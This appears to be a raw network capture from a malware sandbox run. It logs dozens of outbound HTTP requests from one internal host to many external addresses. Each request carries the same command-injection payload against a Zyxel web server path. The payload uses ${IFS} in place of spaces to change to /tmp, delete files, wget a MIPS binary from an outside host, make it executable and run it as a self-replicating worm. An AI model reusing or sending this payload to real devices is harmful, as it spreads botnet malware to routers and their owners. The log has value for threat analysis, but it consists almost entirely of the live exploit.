                                            Feb 2, 2024 06:21:12.612366915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4186192.168.2.155110694.200.15.21443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.612412930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4187192.168.2.1540682146.33.127.79443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.612453938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4188192.168.2.1539236203.136.203.176443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.612488031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4189192.168.2.1536198172.34.25.100443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.612524986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4190192.168.2.1542118163.5.63.23443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.612564087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4191192.168.2.1560276163.205.70.156443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.612592936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4192192.168.2.155510272.6.65.40443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.612637997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4193192.168.2.1536784157.123.44.195443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.612684965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4194192.168.2.1555462199.77.245.139443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.612706900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4195192.168.2.153561641.215.202.203443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.612740993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4196192.168.2.155650257.248.223.97443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.612799883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4197192.168.2.153356044.8.97.196443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.612829924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4198192.168.2.1557702186.32.51.37443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.612852097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4199192.168.2.154823268.41.0.175443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.612886906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4200192.168.2.154128673.154.23.247443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.612946987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4201192.168.2.1558154222.80.95.168443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.612974882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4202192.168.2.1538282216.217.223.248443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.613009930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4203192.168.2.154789439.98.177.242443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.613054037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4204192.168.2.154730891.43.209.209443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.613095999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4205192.168.2.1546010192.133.35.174443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.613128901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4206192.168.2.154949814.12.57.200443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.613173008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4207192.168.2.155024861.223.121.153443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.613205910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4208192.168.2.1550700199.81.142.214443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.613230944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4209192.168.2.153351260.31.118.83443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.613260984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4210192.168.2.154270475.32.196.24443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.613317966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4211192.168.2.154886495.183.6.237443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.613348007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4212192.168.2.155245632.243.55.34443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.613385916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4213192.168.2.153316466.174.76.228443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.613421917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4214192.168.2.1547500118.189.156.215443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.613460064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4215192.168.2.155521687.200.213.113443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.613476038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4216192.168.2.1542098165.2.200.61443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.613548994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4217192.168.2.153996641.87.70.141443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.613558054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4218192.168.2.153375257.203.172.12443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.613615036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4219192.168.2.1550810184.232.198.227443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.613640070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4220192.168.2.1539758108.81.106.214443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.613692999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4221192.168.2.1553344218.60.96.21443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.613699913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4222192.168.2.156086473.91.187.212443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.613733053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4223192.168.2.154790438.115.234.98443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.613759995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4224192.168.2.15569682.210.3.118443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.613781929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4225192.168.2.153398883.82.71.46443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.613833904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4226192.168.2.1552248116.90.203.65443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.613857031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4227192.168.2.1548068113.240.51.6443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.613898993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4228192.168.2.155969636.105.47.75443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.613934040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4229192.168.2.1552706137.54.187.143443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.613966942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4230192.168.2.154362272.55.183.88443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.613997936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4231192.168.2.155109020.193.185.106443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.614032984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4232192.168.2.153893691.237.216.239443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.614082098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4233192.168.2.1547660209.127.227.85443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.614130020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4234192.168.2.155537093.195.169.130443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.614139080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4235192.168.2.1540618155.68.193.249443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.614204884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4236192.168.2.1545262175.39.160.220443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.614234924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4237192.168.2.155610451.102.60.213443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.614279032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4238192.168.2.154297082.137.137.126443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.614319086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4239192.168.2.1534424142.31.175.145443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.614358902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4240192.168.2.1548980219.16.85.206443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.614387035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4241192.168.2.1540392128.58.182.31443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.614404917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4242192.168.2.1546790183.114.128.109443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.614454985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4243192.168.2.1559864107.91.78.39443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.614494085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4244192.168.2.1552644116.142.56.47443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.614536047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4245192.168.2.1539172150.103.96.93443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.614561081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4246192.168.2.1556278218.76.110.234443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.614614964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4247192.168.2.1541920103.141.255.64443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.614639044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4248192.168.2.15333185.246.91.160443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.614691019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4249192.168.2.153637031.69.138.147443
                                            TimestampBytes transferredDirectionData
